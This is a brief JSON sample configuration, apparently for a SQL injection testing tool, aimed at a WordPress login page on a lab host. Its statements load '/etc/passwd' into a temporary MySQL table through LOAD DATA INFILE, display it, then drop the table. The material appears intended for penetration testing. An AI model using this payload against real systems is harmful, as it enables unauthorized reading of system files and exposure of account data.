# This sample assumes a mysql database. Read and display arbitrary
# data from a file.
[
    {
        "attack": "sql_inline",
        "base_url": "http://wpvuln/wp-login.php",
        "attribute": "inline",
        "statements": [
            "create table tmpread (line blob)",
            "load data infile \"/etc/passwd\" into table tmpread",
            "select * from tmpread",
            "drop table tmpread"
        ]
    }
]
